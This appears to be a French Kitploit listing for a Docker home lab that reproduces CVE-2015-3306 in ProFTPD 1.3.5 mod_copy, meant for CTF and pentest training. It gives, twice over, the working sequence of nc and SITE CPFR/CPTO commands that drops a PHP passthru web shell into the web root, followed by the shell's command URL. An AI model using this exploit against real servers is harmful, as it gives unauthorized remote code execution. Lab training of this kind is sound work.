Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - Configuration d'un laboratoire local RCE (Docker) facile à utiliser pour le Red Teaming ou les Tests de Pénétration | Kitploit
Outils/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique
GitHub
netw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - Configuration d'un laboratoire local RCE (Docker) facile à utiliser pour le Red Teaming ou les Tests de Pénétration

Voir le dépôt
8il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FRANÇAIS CI-DESSOUS

CVE20153306

Ce laboratoire a été conçu pour simuler la vulnérabilité CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
Il est utilisé pour apprendre l’injection de Web Shell RCE via le module mod_copy de ProFTPD.


Fonctionnalités

  • ProFTPD 1.3.5 vulnérable
  • Activation complète de mod_copy (SITE CPFR / SITE CPTO)
  • Prise en charge du FTP anonyme
  • Apache2 + PHP5 pour simuler la racine web /var/www/html
  • L’attaquant peut utiliser SITE CPFR/CPTO pour copier un fichier vers la racine web afin de déclencher une RCE
  • Génération automatique de flag_RANDOM.txt à chaque démarrage du conteneur
  • Laboratoire idéal pour CTF / Red Team / Pentest Training

Structure des répertoires

/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

Utilisation (Exécution du conteneur)

docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

Méthode de test de la vulnérabilité CVE-2015-3306

nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Ouvrir via le navigateur :

http://<IP>/webshell.php?cmd=<commande>

Flag

Stocké dans :

/tmp/flag_RANDOM.txt

Version française — Laboratoire RCE ProFTPD 1.3.5 (mod_copy)

Ce laboratoire simule CVE-2015-3306 en utilisant ProFTPD 1.3.5 avec mod_copy, permettant aux attaquants d’effectuer une copie de fichier distante vers RCE via ProFTPD mod_copy.


Fonctionnalités

  • ProFTPD 1.3.5 vulnérable compilé depuis les sources
  • Activation de mod_copy (SITE CPFR + SITE CPTO)
  • Accès FTP anonyme
  • Apache2 + PHP5 pour l’exécution du webshell
  • Génération automatique de flag_RANDOM.txt au démarrage du conteneur
  • Parfait pour les CTF, l’éducation et la recherche d’exploits

Exemple de test d’exploitation

nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Puis exécuter :

http://<IP>/webshell.php?cmd=<commande>

Emplacement du flag

/tmp/flag_RANDOM.txt

Avertissement

À des fins éducatives et de tests d’intrusion autorisés uniquement.

Télécharger l’outil